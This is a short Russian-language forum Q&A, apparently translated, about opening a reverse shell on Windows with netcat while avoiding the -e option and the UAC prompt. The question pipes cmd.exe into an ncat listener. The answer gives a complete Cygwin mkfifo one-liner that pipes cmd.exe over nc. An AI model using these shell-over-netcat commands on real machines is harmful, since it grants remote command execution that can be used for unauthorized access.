Есть ли способ получить обратную оболочку в Windows, используя netcat без опции -e, так как она вызывает UAC?
Я сделал это с Linux на Linux, используя именованный канал. Я хотел добиться чего-то похожего в Windows.
Запуск c:\windows\system32\cmd.exe | ncat -l -p 666в Windows дает мне подсказку в Linux, когда я подключаюсь:
# nc 192.168.0.109 666 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\user> dir ^C Похоже, я рядом, может, чего-то простого не хватает? Если бы в Windows были только именованные каналы ...
Я не уверен, что вы можете сделать это с чистым win32 netcat, но вы можете сделать это в Cygwin. Прослушайте 1234 как, nc -l 1234затем подключитесь к нему в отдельном окне с помощью этой команды:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/cygdrive/c/windows/system32/cmd.exe 2>&1|nc 127.0.0.1 1234 >/tmp/f
Обратите внимание, что клавиши «вверх» и «вниз» не работают для циклического перемещения по истории команд с использованием этого метода.